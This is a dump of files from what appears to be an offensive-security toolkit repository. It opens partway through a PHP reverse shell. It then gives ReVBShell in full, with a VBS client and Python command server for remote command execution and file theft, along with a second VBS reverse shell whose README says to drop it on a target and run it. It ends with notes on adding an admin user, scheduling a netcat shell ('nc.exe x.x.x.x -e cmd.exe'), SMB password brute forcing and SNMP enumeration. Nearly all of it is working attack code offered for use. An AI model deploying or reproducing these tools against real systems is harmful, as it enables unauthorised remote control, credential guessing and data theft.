stderr is a pipe that the child will write to 101 | ); 102 | $process = proc_open($shell, $descriptorspec, $pipes); 103 | if (!is_resource($process)) { 104 | printit("ERROR: Can't spawn shell"); 105 | exit(1); 106 | } 107 | // Set everything to non-blocking 108 | // Reason: Occsionally reads will block, even though stream_select tells us they won't 109 | stream_set_blocking($pipes[0], 0); 110 | stream_set_blocking($pipes[1], 0); 111 | stream_set_blocking($pipes[2], 0); 112 | stream_set_blocking($sock, 0); 113 | printit("Successfully opened reverse shell to $ip:$port"); 114 | while (1) { 115 | // Check for end of TCP connection 116 | if (feof($sock)) { 117 | printit("ERROR: Shell connection terminated"); 118 | break; 119 | } 120 | // Check for end of STDOUT 121 | if (feof($pipes[1])) { 122 | printit("ERROR: Shell process terminated"); 123 | break; 124 | } 125 | // Wait until a command is end down $sock, or some 126 | // command output is available on STDOUT or STDERR 127 | $read_a = array($sock, $pipes[1], $pipes[2]); 128 | $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null); 129 | // If we can read from the TCP socket, send 130 | // data to process's STDIN 131 | if (in_array($sock, $read_a)) { 132 | if ($debug) printit("SOCK READ"); 133 | $input = fread($sock, $chunk_size); 134 | if ($debug) printit("SOCK: $input"); 135 | fwrite($pipes[0], $input); 136 | } 137 | // If we can read from the process's STDOUT 138 | // send data down tcp connection 139 | if (in_array($pipes[1], $read_a)) { 140 | if ($debug) printit("STDOUT READ"); 141 | $input = fread($pipes[1], $chunk_size); 142 | if ($debug) printit("STDOUT: $input"); 143 | fwrite($sock, $input); 144 | } 145 | // If we can read from the process's STDERR 146 | // send data down tcp connection 147 | if (in_array($pipes[2], $read_a)) { 148 | if ($debug) printit("STDERR READ"); 149 | $input = fread($pipes[2], $chunk_size); 150 | if ($debug) printit("STDERR: $input"); 151 | fwrite($sock, $input); 152 | } 153 | } 154 | fclose($sock); 155 | fclose($pipes[0]); 156 | fclose($pipes[1]); 157 | fclose($pipes[2]); 158 | proc_close($process); 159 | // Like print, but does nothing if we've daemonised ourself 160 | // (I can't figure out how to redirect STDOUT like a proper daemon) 161 | function printit ($string) { 162 | if (!$daemon) { 163 | print "$string\n"; 164 | } 165 | } 166 | ?> 167 | -------------------------------------------------------------------------------- /ReverseShell/revbshell/LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2017, Arris Huijgen 4 | All rights reserved. 5 | 6 | Redistribution and use in source and binary forms, with or without 7 | modification, are permitted provided that the following conditions are met: 8 | 9 | * Redistributions of source code must retain the above copyright notice, this 10 | list of conditions and the following disclaimer. 11 | 12 | * Redistributions in binary form must reproduce the above copyright notice, 13 | this list of conditions and the following disclaimer in the documentation 14 | and/or other materials provided with the distribution. 15 | 16 | * Neither the name of the copyright holder nor the names of its 17 | contributors may be used to endorse or promote products derived from 18 | this software without specific prior written permission. 19 | 20 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 21 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 22 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 23 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 24 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 25 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 26 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 27 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 28 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 29 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 30 | -------------------------------------------------------------------------------- /ReverseShell/revbshell/README.md: -------------------------------------------------------------------------------- 1 | # ReVBShell 2 | ## Files 3 | * server.py - Interactive Python shell, listening on port 8080 for clients 4 | * client.vbs - Visual Basic Script client which connectes to the IP/port specified and periodically fetches commands 5 | 6 | ## Components 7 | ### Server 8 | _Interactive Python shell_ 9 | 10 | **Supported commands** 11 | ``` 12 | - CD [directory] - Change directory. Shows current directory when without parameter. 13 | - DOWNLOAD [path] - Download the file at [path] to the .\Downloads folder. 14 | - GETUID - Get shell user id. 15 | - GETWD - Get working directory. Same as CD. 16 | - HELP - Show this help. 17 | - IFCONFIG - Show network configuration. 18 | - KILL - Stop script on the remote host. 19 | - PS - Show process list. 20 | - PWD - Same as GETWD and CD. 21 | - SET [name] [value] - Set a variable, for example SET LHOST 192.168.1.77. 22 | When entered without parameters, it shows the currently set variables. 23 | - SHELL [command] - Execute command in cmd.exe interpreter; 24 | When entered without command, switches to SHELL context. 25 | - SHUTDOWN - Exit this commandline interface (does not shutdown the client). 26 | - SYSINFO - Show sytem information. 27 | - SLEEP [ms] - Set client polling interval; 28 | When entered without ms, shows the current interval. 29 | - UNSET [name] - Unset a variable 30 | - UPLOAD [localpath] - Upload the file at [path] to the remote host. 31 | Note: Variable LHOST is required. 32 | - WGET [url] - Download file from url. 33 | ``` 34 | 35 | ### Client 36 | _VBS client_ 37 | Configuration can be set in the .vbs file itself. 38 | * strHost - IP of host to connect back to; should be the IP of the host where server.py is running 39 | * strPort - Listening port on the above host 40 | * intSleep - Default delay between the polls to the server 41 | 42 | **Default settings** 43 | ``` 44 | strHost = "127.0.0.1" 45 | strPort = "8080" 46 | intSleep = 5000 47 | ``` 48 | -------------------------------------------------------------------------------- /ReverseShell/revbshell/client.vbs: -------------------------------------------------------------------------------- 1 | ' This software is provided under under the BSD 3-Clause License. 2 | ' See the accompanying LICENSE file for more information. 3 | ' 4 | ' Client for Reverse VBS Shell 5 | ' 6 | ' Author: 7 | ' Arris Huijgen 8 | ' 9 | ' Website: 10 | ' https://github.com/bitsadmin/ReVBShell 11 | ' 12 | 13 | Option Explicit 14 | On Error Resume Next 15 | 16 | ' Instantiate objects 17 | Dim shell: Set shell = CreateObject("WScript.Shell") 18 | Dim fs: Set fs = CreateObject("Scripting.FileSystemObject") 19 | Dim wmi: Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\CIMV2") 20 | Dim http: Set http = CreateObject("WinHttp.WinHttpRequest.5.1") 21 | If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") 22 | If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") 23 | If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") 24 | 25 | ' Initialize variables used by GET/WGET 26 | Dim arrSplitUrl, strFilename, stream 27 | 28 | ' Configuration 29 | Dim strHost, strPort, strUrl, strCD, intSleep 30 | strHost = "127.0.0.1" 31 | strPort = "8080" 32 | intSleep = 5000 33 | strUrl = "http://" & strHost & ":" & strPort 34 | strCD = "." 35 | 36 | ' Periodically poll for commands 37 | Dim strInfo 38 | While True 39 | ' Fetch next command 40 | http.Open "GET", strUrl & "/", False 41 | http.Send 42 | Dim strRawCommand 43 | strRawCommand = http.ResponseText 44 | 45 | ' Determine command and arguments 46 | Dim arrResponseText, strCommand, strArgument 47 | arrResponseText = Split(strRawCommand, " ", 2) 48 | strCommand = arrResponseText(0) 49 | strArgument = "" 50 | If UBound(arrResponseText) > 0 Then 51 | strArgument = arrResponseText(1) 52 | End If 53 | 54 | ' Fix ups 55 | If strCommand = "PWD" Or strCommand = "GETWD" Then 56 | strCommand = "CD" 57 | strArgument = "" 58 | End If 59 | 60 | ' Execute command 61 | Select Case strCommand 62 | ' Sleep X seconds 63 | Case "NOOP" 64 | WScript.Sleep intSleep 65 | 66 | ' Get host info 67 | Case "SYSINFO" 68 | Dim objOS, strComputer, strOS, strBuild, strServicePack, strArchitecture, strLanguage 69 | For Each objOS in wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem") 70 | strComputer = objOS.CSName 71 | strOS = objOS.Caption 72 | strBuild = objOS.BuildNumber 73 | strServicePack = objOS.CSDVersion 74 | strArchitecture = objOS.OSArchitecture 75 | strLanguage = objOS.OSLanguage 76 | Exit For 77 | Next 78 | 79 | Dim strVersion 80 | strVersion = strOS & " (Build " & strBuild 81 | If strServicePack <> "" Then 82 | strVersion = strVersion & ", " & strServicePack 83 | End If 84 | strVersion = strVersion & ")" 85 | 86 | strInfo = "Computer: " & strComputer & vbCrLf & _ 87 | "OS: " & strVersion & vbCrLf & _ 88 | "Architecture: " & strArchitecture & vbCrLf & _ 89 | "System Language: " & strLanguage 90 | 91 | SendStatusUpdate strRawCommand, strInfo 92 | 93 | ' Current user, including domain 94 | Case "GETUID" 95 | Dim strUserDomain, strUsername 96 | strUserDomain = shell.ExpandEnvironmentStrings("%USERDOMAIN%") 97 | strUsername = shell.ExpandEnvironmentStrings("%USERNAME%") 98 | strInfo = "Username: " & strUserDomain & "\" & strUserName 99 | 100 | SendStatusUpdate strRawCommand, strInfo 101 | 102 | ' IP configuration 103 | Case "IFCONFIG" 104 | Dim arrNetworkAdapters: Set arrNetworkAdapters = wmi.ExecQuery("SELECT * FROM Win32_NetworkAdapterConfiguration WHERE MACAddress > ''") 105 | Dim objAdapter 106 | strInfo = "" 107 | For Each objAdapter In arrNetworkAdapters 108 | strInfo = strInfo & objAdapter.Description & vbCrLf 109 | If IsArray(objAdapter.IPAddress) Then 110 | strInfo = strInfo & Join(objAdapter.IPAddress, vbCrLf) & vbCrLf & vbCrLf 111 | Else 112 | strInfo = strInfo & "[Interface down]" & vbCrLf & vbCrLf 113 | End If 114 | Next 115 | 116 | ' Remove trailing \r\n's 117 | strInfo = Mid(strInfo, 1, Len(strInfo)-4) 118 | 119 | SendStatusUpdate strRawCommand, strInfo 120 | 121 | ' Process list 122 | Case "PS" 123 | Dim arrProcesses: Set arrProcesses = wmi.ExecQuery("SELECT * FROM Win32_Process") 124 | strInfo = PadRight("PID", 5) & " " & PadRight("Name", 24) & " " & "Session" & " " & PadRight("User", 19) & " " & "Path" & vbCrLf & _ 125 | PadRight("---", 5) & " " & PadRight("----", 24) & " " & "-------" & " " & PadRight("----", 19) & " " & "----" & vbCrLf 126 | Dim objProcess, strPID, strName, strSession, intHresult, strPDomain, strPUsername, strDomainUser, strPath 127 | For Each objProcess In arrProcesses 128 | strPID = objProcess.Handle 129 | strName = objProcess.Name 130 | strSession = objProcess.SessionId 131 | intHresult = objProcess.GetOwner(strPUsername, strPDomain) 132 | Select Case intHresult 133 | Case 0 134 | strDomainUser = strPDomain & "\" & strPUsername 135 | Case 2 136 | strDomainUser = "[Access Denied]" 137 | Case 3 138 | strDomainUser = "[Insufficient Privilege]" 139 | Case 8 140 | strDomainUser = "[Unknown Failure]" 141 | Case Else 142 | strDomainUser = "[Other]" 143 | End Select 144 | 145 | strPath = objProcess.ExecutablePath 146 | 147 | strInfo = strInfo & PadRight(strPid, 5) & " " & PadRight(strName, 24) & " " & PadRight(strSession, 7) & " " & PadRight(strDomainUser, 19) & " " & strPath & vbCrLf 148 | Next 149 | 150 | ' Remove trailing newline 151 | strInfo = Mid(strInfo, 1, Len(strInfo)-2) 152 | 153 | SendStatusUpdate strRawCommand, strInfo 154 | 155 | ' Set sleep time 156 | Case "SLEEP" 157 | If strArgument <> "" Then 158 | intSleep = CInt(strArgument) 159 | SendStatusUpdate strRawCommand, "Sleep set to " & strArgument & "ms" 160 | Else 161 | Dim strSleep 162 | strSleep = CStr(intSleep) 163 | SendStatusUpdate strRawCommand, "Sleep is currently set to " & strSleep & "ms" 164 | strSleep = Empty 165 | End If 166 | 167 | ' Execute command 168 | Case "SHELL" 169 | 'Execute and write to file 170 | Dim strOutFile: strOutFile = fs.GetSpecialFolder(2) & "\rso.txt" 171 | shell.Run "cmd /C pushd """ & strCD & """ && " & strArgument & "> """ & strOutFile & """ 2>&1", 0, True 172 | 173 | ' Read out file 174 | Dim file: Set file = fs.OpenTextFile(strOutfile, 1) 175 | Dim text 176 | If Not file.AtEndOfStream Then 177 | text = file.ReadAll 178 | Else 179 | text = "[empty result]" 180 | End If 181 | file.Close 182 | fs.DeleteFile strOutFile, True 183 | 184 | ' Set response 185 | SendStatusUpdate strRawCommand, text 186 | 187 | ' Clean up 188 | strOutFile = Empty 189 | text = Empty 190 | 191 | ' Change Directory 192 | Case "CD" 193 | ' Only change directory when argument is provided 194 | If Len(strArgument) > 0 Then 195 | Dim strNewCdPath 196 | strNewCdPath = GetAbsolutePath(strArgument) 197 | 198 | If fs.FolderExists(strNewCdPath) Then 199 | strCD = strNewCdPath 200 | End If 201 | End If 202 | 203 | SendStatusUpdate strRawCommand, strCD 204 | 205 | ' Download a file from a URL 206 | Case "WGET" 207 | ' Determine filename 208 | arrSplitUrl = Split(strArgument, "/") 209 | strFilename = arrSplitUrl(UBound(arrSplitUrl)) 210 | strFilename = GetAbsolutePath(strFilename) 211 | 212 | ' Fetch file 213 | Err.Clear() ' Set error number to 0 214 | http.Open "GET", strArgument, False 215 | http.Send 216 | 217 | If Err.number <> 0 Then 218 | SendStatusUpdate strRawCommand, "Error when downloading from " & strArgument & ": " & Err.Description 219 | Else 220 | ' Write to file 221 | Set stream = createobject("Adodb.Stream") 222 | With stream 223 | .Type = 1 'adTypeBinary 224 | .Open 225 | .Write http.ResponseBody 226 | .SaveToFile strFilename, 2 'adSaveCreateOverWrite 227 | End With 228 | 229 | ' Set response 230 | SendStatusUpdate strRawCommand, "File download from " & strArgument & " successful." 231 | End If 232 | 233 | ' Clean up 234 | arrSplitUrl = Array() 235 | strFilename = Empty 236 | 237 | ' Send a file to the server 238 | Case "DOWNLOAD" 239 | Dim strFullSourceFilePath 240 | strFullSourceFilePath = GetAbsolutePath(strArgument) 241 | 242 | ' Only download if file exists 243 | If fs.FileExists(strFullSourceFilePath) Then 244 | ' Determine filename 245 | arrSplitUrl = Split(strFullSourceFilePath, "\") 246 | strFilename = arrSplitUrl(UBound(arrSplitUrl)) 247 | 248 | ' Read the file to memory 249 | Set stream = CreateObject("Adodb.Stream") 250 | stream.Type = 1 ' adTypeBinary 251 | stream.Open 252 | stream.LoadFromFile strFullSourceFilePath 253 | Dim binFileContents 254 | binFileContents = stream.Read 255 | 256 | ' Upload file 257 | DoHttpBinaryPost "upload", strRawCommand, strFilename, binFileContents 258 | 259 | ' Clean up 260 | binFileContents = Empty 261 | ' File does not exist 262 | Else 263 | SendStatusUpdate strRawCommand, "File does not exist: " & strFullSourceFilePath 264 | End If 265 | 266 | ' Clean up 267 | arrSplitUrl = Array() 268 | strFilename = Empty 269 | strFullSourceFilePath = Empty 270 | 271 | ' Self-destruction, exits script 272 | Case "KILL" 273 | SendStatusUpdate strRawCommand, "Goodbye!" 274 | WScript.Quit 0 275 | 276 | ' Unknown command 277 | Case Else 278 | SendStatusUpdate strRawCommand, "Unknown command" 279 | End Select 280 | 281 | ' Clean up 282 | strRawCommand = Empty 283 | arrResponseText = Array() 284 | strCommand = Empty 285 | strArgument = Empty 286 | strInfo = Empty 287 | Wend 288 | 289 | 290 | Function PadRight(strInput, intLength) 291 | Dim strOutput 292 | strOutput = LEFT(strInput & Space(intLength), intLength) 293 | strOutput = LEFT(strOutput & String(intLength, " "), intLength) 294 | PadRight = strOutput 295 | End Function 296 | 297 | 298 | Function GetAbsolutePath(strPath) 299 | Dim strOutputPath 300 | strOutputPath = "" 301 | 302 | ' Use backslashes 303 | strPath = Replace(strPath, "/", "\") 304 | 305 | ' Absolute paths : \Windows C:\Windows D:\ 306 | ' Relative paths: .. ..\ .\dir .\dir\ dir dir\ dir1\dir2 dir1\dir2\ 307 | If Left(strPath, 1) = "\" Or InStr(1, strPath, ":") <> 0 Then 308 | strOutputPath = strPath 309 | Else 310 | strOutputPath = strCD & "\" & strPath 311 | End If 312 | 313 | GetAbsolutePath = fs.GetAbsolutePathName(strOutputPath) 314 | End Function 315 | 316 | 317 | Function SendStatusUpdate(strText, strData) 318 | Dim binData 319 | binData = StringToBinary(strData) 320 | DoHttpBinaryPost "cmd", strText, "cmdoutput", binData 321 | End Function 322 | 323 | 324 | Function DoHttpBinaryPost(strActionType, strText, strFilename, binData) 325 | ' Compile POST headers and footers 326 | Const strBoundary = "----WebKitFormBoundaryNiV6OvjHXJPrEdnb" 327 | Dim binTextHeader, binText, binDataHeader, binFooter, binConcatenated 328 | binTextHeader = StringToBinary("--" & strBoundary & vbCrLf & _ 329 | "Content-Disposition: form-data; name=""cmd""" & vbCrLf & vbCrLf) 330 | binDataHeader = StringToBinary(vbCrLf & _ 331 | "--" & strBoundary & vbCrLf & _ 332 | "Content-Disposition: form-data; name=""result""; filename=""" & strFilename & """" & vbCrLf & _ 333 | "Content-Type: application/octet-stream" & vbCrLf & vbCrLf) 334 | binFooter = StringToBinary(vbCrLf & "--" & strBoundary & "--" & vbCrLf) 335 | 336 | ' Convert command to binary 337 | binText = StringToBinary(strText) 338 | 339 | ' Concatenate POST headers, data elements and footer 340 | Dim stream : Set stream = CreateObject("Adodb.Stream") 341 | stream.Open 342 | stream.Type = 1 ' adTypeBinary 343 | stream.Write binTextHeader 344 | stream.Write binText 345 | stream.Write binDataHeader 346 | stream.Write binData 347 | stream.Write binFooter 348 | stream.Position = 0 349 | binConcatenated = stream.Read(stream.Size) 350 | 351 | ' Post data 352 | http.Open "POST", strUrl & "/" & strActionType, False 353 | http.SetRequestHeader "Content-Length", LenB(binConcatenated) 354 | http.SetRequestHeader "Content-Type", "multipart/form-data; boundary=" & strBoundary 355 | http.SetTimeouts 5000, 60000, 60000, 60000 356 | http.Send binConcatenated 357 | 358 | ' Receive response 359 | DoHttpBinaryPost = http.ResponseText 360 | End Function 361 | 362 | 363 | Function StringToBinary(Text) 364 | Dim stream: Set stream = CreateObject("Adodb.Stream") 365 | stream.Type = 2 'adTypeText 366 | stream.CharSet = "us-ascii" 367 | 368 | ' Store text in stream 369 | stream.Open 370 | stream.WriteText Text 371 | 372 | ' Change stream type To binary 373 | stream.Position = 0 374 | stream.Type = 1 'adTypeBinary 375 | 376 | ' Return binary data 377 | StringToBinary = stream.Read 378 | End Function 379 | -------------------------------------------------------------------------------- /ReverseShell/revbshell/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # 3 | # This software is provided under under the BSD 3-Clause License. 4 | # See the accompanying LICENSE file for more information. 5 | # 6 | # Server for Reverse VBS Shell 7 | # 8 | # Author: 9 | # Arris Huijgen 10 | # 11 | # Website: 12 | # https://github.com/bitsadmin/ReVBShell 13 | # 14 | 15 | from BaseHTTPServer import BaseHTTPRequestHandler, HTTPServer 16 | import cgi 17 | import os 18 | import sys 19 | from Queue import Queue 20 | from threading import Thread 21 | from shutil import copyfile, rmtree 22 | import ntpath 23 | 24 | PORT_NUMBER = 8080 25 | 26 | 27 | class myHandler(BaseHTTPRequestHandler): 28 | def do_GET(self): 29 | # File download 30 | if self.path.startswith('/f/'): 31 | # Compile path 32 | filename = ntpath.basename(self.path) 33 | filepath = './upload/%s' % filename 34 | 35 | # 404 if no valid file 36 | if not os.path.exists(filepath): 37 | self.send_error(404) 38 | return 39 | 40 | # Return file 41 | with open(filepath, 'rb') as f: 42 | self.send_response(200) 43 | self.send_header('content-type', 'application/octet-stream') 44 | self.end_headers() 45 | self.wfile.write(f.read()) 46 | 47 | # Remove file from disk 48 | os.remove(filepath) 49 | 50 | return 51 | 52 | if commands.empty(): 53 | content = 'NOOP' 54 | else: 55 | content = commands.get() 56 | 57 | # Return result 58 | self.send_response(200) 59 | self.send_header('content-type', 'text/plain') 60 | self.end_headers() 61 | self.wfile.write(content) 62 | return 63 | 64 | # Result from executing command 65 | def do_POST(self): 66 | global context 67 | 68 | # File upload 69 | form = cgi.FieldStorage(fp=self.rfile, headers=self.headers, environ={'REQUEST_METHOD': 'POST'}) 70 | cmd_data = form['cmd'].file.read() 71 | result_filename = form['result'].filename 72 | result_data = form['result'].file.read() 73 | 74 | # Show '> ' command input string after command output 75 | if context: 76 | cmd_data = cmd_data.replace(context + ' ', '') 77 | print cmd_data 78 | 79 | # Store file 80 | if self.path == '/upload': 81 | # Create folder if required 82 | if not os.path.exists('Downloads'): 83 | os.mkdir('Downloads') 84 | 85 | # Write file to disk 86 | with file(os.path.join('Downloads', result_filename), 'wb') as f: 87 | f.write(result_data) 88 | 89 | print 'File \'%s\' downloaded.' % result_filename 90 | # Print output 91 | else: 92 | print result_data 93 | 94 | sys.stdout.write('%s> ' % context) 95 | 96 | # Respond 97 | self.send_response(200) 98 | self.send_header('content-type', 'text/plain') 99 | self.end_headers() 100 | self.wfile.write('OK') 101 | return 102 | 103 | # Do not write log messages to console 104 | def log_message(self, format, *args): 105 | return 106 | 107 | 108 | def run_httpserver(): 109 | #commands.put('GET C:\\secret.bin') 110 | #commands.put('SHELL dir C:\\') 111 | #commands.put('SHELL type client.vbs') 112 | global server 113 | server = HTTPServer(('', PORT_NUMBER), myHandler) 114 | server.serve_forever() 115 | 116 | commands = Queue() 117 | server = None 118 | context = '' 119 | variables = {} 120 | 121 | def main(): 122 | # Start HTTP server thread 123 | #run_httpserver() # Run without treads for debugging purposes 124 | httpserver = Thread(target=run_httpserver) 125 | httpserver.start() 126 | 127 | # Loop to add new commands 128 | global context, variables 129 | s = '' 130 | while True: 131 | s = raw_input('%s> ' % context) 132 | s = s.strip() 133 | splitcmd = s.split(' ', 1) 134 | cmd = splitcmd[0].upper() 135 | 136 | # In a context 137 | if context == 'SHELL' and cmd != 'CD': 138 | cmd = context 139 | 140 | if s.upper() == 'EXIT': 141 | context = '' 142 | continue 143 | else: 144 | args = s 145 | 146 | # Ignore empty commands 147 | if not args: 148 | continue 149 | # No context 150 | else: 151 | args = '' 152 | if len(splitcmd) > 1: 153 | args = splitcmd[1] 154 | 155 | # Ignore empty commands 156 | if not cmd: 157 | continue 158 | 159 | # UPLOAD 160 | elif cmd == 'UPLOAD': 161 | args = args.strip("\"") 162 | 163 | # Check file existence 164 | if not os.path.exists(args): 165 | print 'File not found: %s' % args 166 | continue 167 | 168 | # Check if LHOST variable is set 169 | if 'LHOST' not in variables: 170 | print 'Variable LHOST not set' 171 | continue 172 | lhost = variables['LHOST'] 173 | 174 | # Create folder if required 175 | if not os.path.exists('upload'): 176 | os.mkdir('upload') 177 | 178 | # Copy file 179 | filename = ntpath.basename(args) 180 | copyfile(args, './upload/%s' % filename) 181 | 182 | # Update command and args 183 | cmd = 'WGET' 184 | args = 'http://%s:%d/f/%s' % (lhost, PORT_NUMBER, filename) 185 | 186 | # UNSET 187 | elif cmd == 'UNSET': 188 | if args.upper() in variables: 189 | del variables[args.upper()] 190 | continue 191 | 192 | # SHELL 193 | elif cmd == 'SHELL' and not args: 194 | context = 'SHELL' 195 | continue 196 | 197 | # SET 198 | elif cmd == 'SET': 199 | if args: 200 | (variable, value) = args.split(' ') 201 | variables[variable.upper()] = value 202 | else: 203 | print '\n'.join('%s: %s' % (key, value) for key,value in variables.iteritems()) 204 | continue 205 | 206 | # HELP 207 | elif cmd == 'HELP': 208 | print 'Supported commands:\n' \ 209 | '- CD [directory] - Change directory. Shows current directory when without parameter.\n' \ 210 | '- DOWNLOAD [path] - Download the file at [path] to the .\\Downloads folder.\n' \ 211 | '- GETUID - Get shell user id.\n' \ 212 | '- GETWD - Get working directory. Same as CD.\n' \ 213 | '- HELP - Show this help.\n' \ 214 | '- IFCONFIG - Show network configuration.\n' \ 215 | '- KILL - Stop script on the remote host.\n' \ 216 | '- PS - Show process list.\n' \ 217 | '- PWD - Same as GETWD and CD.\n' \ 218 | '- SET [name] [value] - Set a variable, for example SET LHOST 192.168.1.77.\n' \ 219 | ' When entered without parameters, it shows the currently set variables.\n' \ 220 | '- SHELL [command] - Execute command in cmd.exe interpreter;\n' \ 221 | ' When entered without command, switches to SHELL context.\n' \ 222 | '- SHUTDOWN - Exit this commandline interface (does not shutdown the client).\n' \ 223 | '- SYSINFO - Show sytem information.\n' \ 224 | '- SLEEP [ms] - Set client polling interval;\n' \ 225 | ' When entered without ms, shows the current interval.\n' \ 226 | '- UNSET [name] - Unset a variable\n' \ 227 | '- UPLOAD [localpath] - Upload the file at [path] to the remote host.\n' \ 228 | ' Note: Variable LHOST is required.\n' \ 229 | '- WGET [url] - Download file from url.\n' 230 | continue 231 | 232 | # SHUTDOWN 233 | elif cmd == 'SHUTDOWN': 234 | server.shutdown() 235 | if os.path.exists('./upload'): 236 | rmtree('./upload') 237 | print 'Shutting down %s' % os.path.basename(__file__) 238 | exit(0) 239 | 240 | commands.put(' '.join([cmd, args])) 241 | 242 | if __name__ == '__main__': 243 | main() -------------------------------------------------------------------------------- /ReverseShell/vbs-reverse-shell/README.rst: -------------------------------------------------------------------------------- 1 | Description 2 | =========== 3 | 4 | Collection of VBS reverse shells 5 | 6 | VBS reverse shells are a bit tricky because there's no easy way to interact 7 | with raw sockets from VBS natively on Windows. However, since powershell 8 | isn't always available on the target computer, VBS reverse shells have a real 9 | value. So if you need them, they're here! 10 | 11 | How to use it 12 | ============= 13 | 14 | - Start the python server on your machine. 15 | - Adapt one of the VBS files with your IP address. 16 | - Drop this VBS file onto the target and execute it. 17 | 18 | Dependencies 19 | ============ 20 | 21 | - Python3 22 | 23 | License 24 | ======= 25 | 26 | This program is under the GPLv3 License. 27 | 28 | You should have received a copy of the GNU General Public License 29 | along with this program. If not, see . 30 | -------------------------------------------------------------------------------- /ReverseShell/vbs-reverse-shell/reverse_shell.vbs: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | On Error Resume Next 3 | 4 | CONST callbackUrl = "http://localhost:80/" 5 | 6 | Dim xmlHttpReq, shell, execObj, command, break, result 7 | 8 | Set shell = CreateObject("WScript.Shell") 9 | 10 | break = False 11 | While break <> True 12 | Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP") 13 | xmlHttpReq.Open "GET", callbackUrl, false 14 | xmlHttpReq.Send 15 | 16 | command = "cmd /c " & Trim(xmlHttpReq.responseText) 17 | 18 | If InStr(command, "EXIT") Then 19 | break = True 20 | Else 21 | Set execObj = shell.Exec(command) 22 | 23 | result = "" 24 | Do Until execObj.StdOut.AtEndOfStream 25 | result = result & execObj.StdOut.ReadAll() 26 | Loop 27 | 28 | Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP") 29 | xmlHttpReq.Open "POST", callbackUrl, false 30 | xmlHttpReq.Send(result) 31 | End If 32 | Wend 33 | -------------------------------------------------------------------------------- /ReverseShell/vbs-reverse-shell/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socketserver 4 | 5 | PORT=80 6 | 7 | class CmdHttpHandler(socketserver.BaseRequestHandler): 8 | def handle(self): 9 | self.data = self.request.recv(2**14).strip().decode("UTF-8") 10 | 11 | if len(data) == 0: 12 | return 13 | 14 | elif self.data.splitlines()[0].startswith("GET"): 15 | command = input("%s > " % self.client_address[0]).encode("UTF-8") 16 | 17 | response = (b"HTTP/1.1 200\ncontent-length: " 18 | + str(len(command)).encode("UTF-8") 19 | + b"\n\n" 20 | + command) 21 | 22 | self.request.sendall(response) 23 | 24 | 25 | elif self.data.splitlines()[0].startswith("POST"): 26 | data = self.request.recv(2**14).strip().decode("UTF-8") 27 | print(data) 28 | print() 29 | 30 | response = (b"HTTP/1.1 200\ncontent-length: 0\n\n") 31 | self.request.sendall(response) 32 | return 33 | 34 | 35 | else: 36 | print(self.data.decode("UTF-8")) 37 | response = (b"HTTP/1.1 300\ncontent-length: 0\n\n") 38 | self.request.sendall(response) 39 | 40 | 41 | def main(): 42 | print("To close connection enter 'EXIT'") 43 | print("The computer may be stalled by some commands, just try again") 44 | print() 45 | 46 | with socketserver.TCPServer(("0.0.0.0", PORT), CmdHttpHandler) as server: 47 | server.serve_forever() 48 | 49 | 50 | if __name__ == "__main__": 51 | main() 52 | -------------------------------------------------------------------------------- /RunAs/RunAsSpc.txt: -------------------------------------------------------------------------------- 1 | RunAsSpc = runas + password + encryption 2 | 3 | https://robotronic.de/guidance.html 4 | 5 | ADD USER: 6 | C:\windows\temp> echo net user xiaoxiaoleo xiaoxiaoleo /add > addme.bat 7 | C:\windows\temp> runasspc.exe /program:"addme.bat" /user:"administrator" /password:"password" 8 | -------------------------------------------------------------------------------- /RunAs/runas.ps1: -------------------------------------------------------------------------------- 1 | secpasswd = ConvertTo-SecureString "" -AsPlainText -Force 2 | $mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) 3 | $computer = "" 4 | [System.Diagnostics.Process]::Start("C:/users/public/","", $mycreds.Username, mycreds.Password, $computer) 5 | 6 | 7 | # powershell -ExecutionPolicy Bypass -File c:\users\public\run.ps1 8 | -------------------------------------------------------------------------------- /RunAs/schtasks.txt: -------------------------------------------------------------------------------- 1 | schtasks /query 2 | 3 | 4 | time /t 5 | 6 | schtasks /create /tn "MyTaskName" /tr "c:\users\public\nc.exe x.x.x.x -e cmd.exe" /sc DAILY /st 08:26:00 /ru administrator /rp password 7 | 8 | schtasks /delete /tn MyTaskName /F 9 | -------------------------------------------------------------------------------- /SMB/net_share_brute_force.txt: -------------------------------------------------------------------------------- 1 | acccheck 2 | Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been 3 | chosen, and tries a combination of usernames and passwords in the hope to identify 4 | the password to a given account via a dictionary password guessing attack. 5 | 6 | root@kali:~# acccheck -T pentest/labs/targets.txt -u Administrator -p xxxxx 7 | -------------------------------------------------------------------------------- /SNMP/scan.txt: -------------------------------------------------------------------------------- 1 | 2 | Nmap -sU --open -p 161 x.x.x.x -oG output.txt 3 | 4 | 5 | § snmpcheck -t $ip -c public 6 | § snmpwalk -c public 